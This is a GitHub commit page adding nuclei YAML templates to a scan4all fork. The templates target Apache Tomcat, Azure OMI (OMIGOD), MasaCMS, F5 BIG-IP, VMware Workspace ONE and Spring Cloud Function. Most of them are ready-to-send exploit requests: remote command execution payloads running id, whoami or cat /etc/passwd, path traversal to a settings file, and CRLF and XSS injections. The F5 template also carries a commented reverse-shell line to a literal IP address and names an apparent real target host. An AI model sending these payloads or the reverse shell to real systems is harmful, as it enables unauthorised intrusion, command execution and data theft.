forked from GhostTroops/scan4all
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
add more nuclei yaml pocs 2023-09-16
- Loading branch information
Showing
5,582 changed files
with
207,340 additions
and
43 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,47 @@ | ||
| id: CheckCVE_CRLF | ||
| info: | ||
| name: CheckCVE_CRLF | ||
| author: 51pwn | ||
| severity: critical | ||
| description: | | ||
| CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.) | ||
| cat hk1_httpx.json|jq '.url'|sed 's/"//g'|xargs -I % nuclei -duc -t $HOME/MyWork/scan4all/config/51pwn/CRLF.yaml -u % | ||
| reference: | ||
| - https://www.hacking8.com/web-hacking-101-zh/7.html | ||
| - https://51pwn.com/CyberChef/#recipe=URL_Decode()&input=aHR0cHM6Ly90d2l0dGVyLmNvbS9sb2dpbj9yZWRpcmVjdF9hZnRlcl9sb2dpbj1odHRwczovL3R3aXR0ZXIuY29tOjIxLyVFNSU5OCU4QQolRTUlOTglOERjb250ZW50LXR5cGU6dGV4dC9odG1sJUU1JTk4JThBJUU1JTk4JThEbG9jYXRpb246JUU1JTk4JThBJUU1JTk4JThECiVFNSU5OCU4QSVFNSU5OCU4RCVFNSU5OCVCQ3N2Zy9vbmxvYWQ9YWxlcnQlMjhpbm5lckhUTUwlMjglMjklRTUlOTglQkU | ||
|
|
||
| tags: web,crlf | ||
|
|
||
| requests: | ||
| - raw: | ||
| - |+ | ||
| GET /login?redirect_after_login=https://twitter.com:21/%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Accept:*/* | ||
| Pragma:no-cache | ||
| Accept-Encoding:gzip, deflate | ||
| Connection: close | ||
| Content-Length: 0 | ||
| - |+ | ||
| GET /?%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>deface</html>",alert(33)," HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Accept:*/* | ||
| Pragma:no-cache | ||
| Accept-Encoding:gzip, deflate | ||
| Connection: close | ||
| Content-Length: 0 | ||
| # end payload | ||
| unsafe: true | ||
| req-condition: true | ||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "svg/onload=alert(innerHTML" | ||
| - "<html>deface</html>" | ||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| id: CVE-2019-0221 | ||
|
|
||
| info: | ||
| name: Apache Tomcat - Cross-Site Scripting | ||
| author: pikpikcu | ||
| severity: medium | ||
| description: | | ||
| Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. | ||
| reference: | ||
| - https://seclists.org/fulldisclosure/2019/May/50 | ||
| - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ | ||
| - https://www.exploit-db.com/exploits/50119 | ||
| - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2019-0221 | ||
| classification: | ||
| cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.1 | ||
| cve-id: CVE-2019-0221 | ||
| cwe-id: CWE-79 | ||
| metadata: | ||
| shodan-query: title:"Apache Tomcat" | ||
| tags: apache,xss,tomcat,seclists,edb,cve,cve2019 | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" | ||
| - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: word | ||
| words: | ||
| - "<script>alert('xss')</script>" | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - "text/html" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 | ||
|
|
||
| # Enhanced by mp on 2022/08/11 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| id: CVE-2020-9484 | ||
|
|
||
| info: | ||
| name: Apache Tomcat Remote Command Execution | ||
| author: dwisiswant0 | ||
| severity: high | ||
| description: | | ||
| When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if | ||
| a) an attacker is able to control the contents and name of a file on the server; and | ||
| b) the server is configured to use the PersistenceManager with a FileStore; and | ||
| c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and | ||
| d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. | ||
| Note that all of conditions a) to d) must be true for the attack to succeed. | ||
| reference: | ||
| - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2020-9484 | ||
| - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E | ||
| - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 7 | ||
| cve-id: CVE-2020-9484 | ||
| cwe-id: CWE-502 | ||
| metadata: | ||
| shodan-query: title:"Apache Tomcat" | ||
| tags: rce,packetstorm,cve,cve2020,apache,tomcat | ||
|
|
||
| requests: | ||
| - method: GET | ||
| headers: | ||
| Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy" | ||
| path: | ||
| - "{{BaseURL}}/index.jsp" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: status | ||
| status: | ||
| - 500 | ||
|
|
||
| - type: word | ||
| part: body | ||
| words: | ||
| - "Exception" | ||
| - "ObjectInputStream" | ||
| - "PersistentManagerBase" | ||
| condition: and | ||
|
|
||
| # Enhanced by mp on 2022/04/04 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,57 @@ | ||
| id: CVE-2021-38647_51pwn | ||
|
|
||
| info: | ||
| name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647 | ||
| author: 51pwn | ||
| severity: Critical | ||
| description: | | ||
| On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io. | ||
| The most critical of them being CVE-2021-38647, now dubbed OMIGOD, | ||
| which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below. | ||
| reference: | ||
| - https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ | ||
|
|
||
| tags: RCE,Web | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wsman HTTP/1.1 | ||
| Connection: close | ||
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/soap+xml;charset=UTF-8 | ||
| <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema"> | ||
| <s:Header> | ||
| <a:To>HTTP://192.168.1.1:5986/wsman/</a:To> | ||
| <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> | ||
| <a:ReplyTo> | ||
| <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> | ||
| </a:ReplyTo> | ||
| <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action> | ||
| <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize> | ||
| <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID> | ||
| <w:OperationTimeout>PT1M30S</w:OperationTimeout> | ||
| <w:Locale xml:lang="en-us" s:mustUnderstand="false" /> | ||
| <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" /> | ||
| <w:OptionSet s:mustUnderstand="true" /> | ||
| <w:SelectorSet> | ||
| <w:Selector Name="__cimnamespace">root/scx</w:Selector> | ||
| </w:SelectorSet> | ||
| </s:Header> | ||
| <s:Body> | ||
| <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"> | ||
| <p:command>id</p:command> | ||
| <p:timeout>0</p:timeout> | ||
| </p:ExecuteShellCommand_INPUT> | ||
| </s:Body> | ||
| </s:Envelope> | ||
| # end | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| - <p:StdOut>(.*uid=.*)<\/p:StdOut> | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: CVE-2021-42183_51pwn | ||
| info: | ||
| name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/. | ||
| author: 51pwn | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/hktalent/nuclei-templates | ||
| - https://51pwn.com | ||
| tags: oss | ||
|
|
||
| requests: | ||
| - raw: | ||
| - |+ | ||
| GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
| Pragma:no-cache | ||
| unsafe: true | ||
| cookie-reuse: true | ||
| req-condition: true | ||
|
|
||
| matchers-condition: or | ||
| matchers: | ||
| - type: dsl | ||
| dsl: | ||
| - "status_code_1 == 200" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,59 @@ | ||
| id: CVE-2022-1388_51pwn | ||
|
|
||
| info: | ||
| name: F5 BIG-IP iControl REST Auth Bypass RCE | ||
| author: dwisiswant0 | ||
| severity: critical | ||
| description: | | ||
| doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml | ||
| This vulnerability may allow an unauthenticated attacker | ||
| with network access to the BIG-IP system through the management | ||
| port and/or self IP addresses to execute arbitrary system commands, | ||
| create or delete files, or disable services. There is no data plane | ||
| exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' " | ||
| reference: | ||
| - https://twitter.com/GossiTheDog/status/1523566937414193153 | ||
| - https://support.f5.com/csp/article/K23605346 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.80 | ||
| cve-id: CVE-2022-1388 | ||
| cwe-id: CWE-306 | ||
| metadata: | ||
| shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" | ||
| verified: true | ||
| tags: bigip,cve,cve2022,rce,mirai | ||
|
|
||
| variables: | ||
| # admin:horizon3 | ||
| auth: "admin:" | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /mgmt/tm/util/bash HTTP/1.1 | ||
| Host: 127.0.0.1 | ||
| Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host | ||
| X-F5-Auth-Token: a | ||
| Authorization: Basic {{base64(auth)}} | ||
| Content-Type: application/json | ||
| { | ||
| "command": "run", | ||
| "utilCmdArgs": "-c id" | ||
| } | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| - "(commandResult)" | ||
| - "(uid=\\d+\\(.*)" | ||
| - type: status | ||
| status: | ||
| - 200 | ||
| condition: and | ||
| extractors: | ||
| - type: regex | ||
| part: body | ||
| regex: | ||
| - "(uid=\\d+\\([^\\n]{3,})" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| id: CVE-2022-22954_51pwn | ||
|
|
||
| info: | ||
| name: VMware Workspace ONE Access - Server-Side Template Injection | ||
| author: 51pwn | ||
| severity: critical | ||
| description: | | ||
| VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. | ||
| reference: | ||
| - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 | ||
| - https://www.vmware.com/security/advisories/VMSA-2022-0011.html | ||
| - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-22954 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2022-22954 | ||
| cwe-id: CWE-94 | ||
| metadata: | ||
| shodan-query: http.favicon.hash:-1250474341 | ||
| tags: cve,cve2022,vmware,ssti,workspaceone,cisa | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| # - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd | ||
| - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "root:*:0:0:" | ||
|
|
||
|
|
||
| # Enhanced by mp on 2022/07/06 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| id: CVE-2022-22963_51pwn | ||
|
|
||
| info: | ||
| name: spring cloud exp | ||
| author: Nicolas Krassas | ||
| severity: critical | ||
| description: RCE on Spring cloud function SPEL | ||
| reference: https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ | ||
| tags: web,spring | ||
|
|
||
| requests: | ||
| - raw: | ||
| - |- | ||
| POST /functionRouter HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
| Accept-Encoding: gzip, deflate | ||
| Accept: */* | ||
| Connection: close | ||
| spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("whoami") | ||
| Accept-Language: en | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Content-Length: 4 | ||
| test | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'functionRouter' | ||
| - type: status | ||
| status: | ||
| - 500 |
Oops, something went wrong.